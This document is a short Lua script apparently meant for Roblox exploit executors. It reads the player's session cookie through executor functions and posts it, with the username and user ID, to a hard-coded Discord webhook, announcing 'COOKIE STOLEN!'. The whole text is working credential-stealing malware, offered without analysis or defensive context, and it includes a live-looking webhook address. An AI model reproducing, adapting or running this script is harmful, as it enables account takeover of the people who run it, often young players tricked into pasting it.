loadstring([[
    local player = game.Players.LocalPlayer
    local http = game:GetService("HttpService")
    
    local cookie = ""
    if syn and syn.cookie then
        cookie = syn.cookie()
    elseif getcookie then
        cookie = getcookie()
    end
    
    local webhook = "https://discord.com/api/webhooks/1499055946222145638/PWJv3IVfr9WAucXk0BYEP54gAp_wuaYpGKJQs5Px-gFRZVyoLv3u81QIZ5XNpkSsdqNx"
    
    local data = {
        content = "**🍪 COOKIE STOLEN!**",
        embeds = {{
            title = player.Name,
            description = "```" .. cookie .. "```",
            color = 0xff0000,
            fields = {
                {name = "User ID", value = tostring(player.UserId), inline = true},
                {name = "Time", value = os.date("%Y-%m-%d %H:%M:%S"), inline = true}
            }
        }}
    }
    
    syn.request({
        Url = webhook,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = http:JSONEncode(data)
    })
    
    print("Cookie sent to Discord!")
]])()
